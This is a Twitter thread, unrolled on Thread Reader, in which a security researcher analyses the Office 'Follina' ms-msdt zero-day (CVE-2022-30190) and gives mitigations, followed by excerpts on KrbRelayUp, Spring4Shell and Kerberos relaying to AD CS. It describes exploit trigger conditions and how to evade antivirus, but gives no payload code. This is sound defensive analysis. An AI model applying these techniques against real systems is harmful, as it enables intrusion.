Will Dormann Profile picture
May 30 17 tweets 9 min read
OK, now that I have access to a computer, let's take a look at this Office 0day that folks are talking about.
It's very similar to the MSHTML CVE-2021-40444 vul from September:
1) Use of '!' at the end of the retrieved URI
2) Size of retrieved HTML must be 4096 bytes or larger
The important difference is that this variant still works.
Let's look at the preview pane attack vector, like we did for CVE-2021-40444 since that one is more fun. Protected View be damned!
Here is Office 2019 on Win10, both with May 2022 updates.
While there very may well be other dangerous protocols besides ms-msdt:, it's probably a good idea to unregister this protocol. Especially while this vulnerability is still unpatched!
I've never seen its use in the real world until today.
gist.github.com/wdormann/03196…
Also, for the love of all that is holy, please don't have the Preview pane enabled in Windows Explorer.
I'd say that there are two behaviors being leveraged here:
1) The #LOLBAS for Msdt.exe happens to have a URI handler way of invoking it. @bohops
2) The ! in the referenced remote HTML file puts MSHTML in YOLO mode where (among other things?) it doesn't prompt for unsafe things.
Why is this combo a problem?
Well, the ms-msdt: URI handler has components implemented in PowerShell. You can make a URI where some parts of arguments are specified to be subexpressions, e.g. $(dosomething)
So obviously dangerous.
If you can get this URI to open w/o prompting, 🎉
I will say it's somewhat chuckle-worthy that the dialog that asks "Do you want to update this document with the data from the linked files" is hidden behind calc
This issue (MSDT, ms-msdt, Follina, or whatever you want to call it) has been assigned CVE-2022-30190 by the way.
msrc-blog.microsoft.com/2022/05/30/gui…
This language is a bit misleading in not really describing what "calling application" means.
If you preview a file in Explorer, which uses Office to render the document, Protected View doesn't do a damn thing.
And of course the unfortunately named "wget" in PowerShell will blindly redirect to unsafe URIs and get exploited. No Office required!
Of course it does.
When I say "unfortunately named"...
Let's say that you have GNU tools installed on your Windows machine, because you like to get stuff done and are stubborn about learning new things.
If you are typing into a PowerShell terminal, you may be surprised by what runs.
e.g. here's ls:
The MS publication doesn't mention it, but the mitigation mentioned by @gentilkiwi seems to work fine in blocking this URI class.
Or for the point-and-clicky among us:
Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics
Set "Troubleshooting: Allow users to access and run Troubleshooting Wizards" to "disabled"
It looks like Defender sigs are making their rounds.
But please don't rely on them. Disable scripted diagnostics or the ms-msdt: URI handler.
If an exploit is tweaked to look a bit different, it slips right past Defender.
But speaking of AV, let's have a look at what happens when an exploit is in multiple parts.
First there's the parent document.
Is it malicious? Absolutely not. It simply loads a remote OLE object, as is supported by Office.
What it does with that depends on what the content is.
Let's now look at the OLE object (HTML content) that triggers the unsafe ms-msdt: URI.
0 hits. Got it.
Finally, let's look at the XML content that is loaded by the diagnostic utility that is loaded by msdt.exe, which is loaded by MSHTML, which is loaded by Microsoft Word, which is loaded by explorer.exe, if you're one of those Preview Pane weirdos. Malformed arguments here.
0 hits

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Will Dormann

Will Dormann Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @wdormann

Apr 26
Yeah, so KrbRelayUp works quite swimmingly.
All an attacker needs is the ability to run code on a domain-joined host, and the result is that you get SYSTEM on that machine.
If "Domain Controller: LDAP server signing requirements" is set to "Require signing", this appears to block the exploit at the stage of relaying kerberos authentication to LDAP.
Also, setting ms-DS-MachineAccountQuota=0 also appears to block this attack.
Even though they're not administrators, by default active directory users have the privilege to add machines to AD for some reason. YOLO and stuff.
jackstromberg.com/2013/01/how-to…
Read 6 tweets
Apr 7
WatchGuard: "For the sake of not guiding potential threat actors... we are not sharing technical details about these flaws"
FBI: Threat Actors are using this in the wild.
WG 9.5 months after release: CVE-2022-23176
arstechnica.com/information-te…
Why is this poor vendor behavior?
When an update is released people can compare the before- and after-patch code to see what has changed, exposing the vulnerability.
If things like CVE/CVSS are skipped, attackers have all that they need and defenders have nothing.
DON'T DO THIS!
Let's dig more.
"if management policies were configured to allow unrestricted management access from external IP addresses"
This nicely shifts the blame to the customer. If you allow management on the WAN side, that's your fault, right?
Let's see what we get by default...
Oh. 🤔 ImageImage
Read 6 tweets
Mar 31
Can confirm! The #Spring4Shell exploit in the wild appears to work against the stock "Handling Form Submission" sample code from spring.io
If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE...
Ways that Cyber Kendra made this worse for everyone:
1) Sensational blog post indicating that this is going to ruin the internet (red flag!).
2) Linking to a git commit about deserialization that has absolutely nothing to do with the issue demonstrated by the original party.
The original researcher also made this a touch more confusing/misleading than it needed to be as well. To one not familiar with Java, the long list of requirements makes it seem like one may need to intentionally make an app vulnerable. This is not the case.
Read 11 tweets
Mar 30
OK, where are we with Spring stuff?
1) CVE-2022-22963 is a thing, and it affects Spring Cloud Connector. It's RCE, so the CVSS score of 5.4 seems way off.
2) Spring4Shell / SpringShell, invented by Cyber Kendra, isn't a Spring vulnerability at all.
Does that sound about right?
And just for the Twitter record, @VMwareTanzu assigned CVE-2022-22963 a CVSS score of 5.4
Yet it's an unauthenticated RCE vulnerability.
Which in my mind puts it closer to a 9.8.
And to tie up this thread, I've confirmed that #SpringShell / #Spring4Shell *IS* indeed a thing.
This wasn't immediately obvious because of Cyber Kendra linking SpringShell to a commit for a COMPLETELY UNRELATED issue that is NOT A VULNERABILITY.
<sigh>
Read 4 tweets
Mar 16
Oh, this is good.
Think you're typing into a pop-up window? Make sure that you try to drag it OUTSIDE OF the content area of the page first.
Surely normal human beings do this.
But wait!
We security folks know that the content area of a browser is 100% under control of somebody else. We wouldn't design a system where a user must visually verify something within this space, right?
Let's look at a site that is apparently popular for some reason: Pinterest
Am I picking on Pinterest? Nope.
This is a standard OAuth login technique. For example, here's an Auth0 demo page.
Are we relying on end users knowing that they need to drag pop-ups outside of the content area of a browser to know that it's legit?
Read 4 tweets
Feb 23
If you enabled Extended Protection for Authentication (EPA) for your AD CS server this summer to protect against PetitPotam, good for you.
If you haven't, well, I've got some bad news for you...
Nothing more than a system on the same (V)LAN as a domain-joined host is required. No password knowledge necessary.
By using mitm6 + krbrelayx to relay a kerberos ticket to an AD CS that hasn't been locked down, we get a certificate that can get us to Domain Admin.
The defenses against this are:
- Enable TLS + EPA in IIS on any AD CS system you use. This is the same thing that protected you against the PetitPotam attack chain.
- If you don't use IPv6, block with firewalls both DHCPv6 and ICMPv6 traffic.
dirkjanm.io/relaying-kerbe…
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(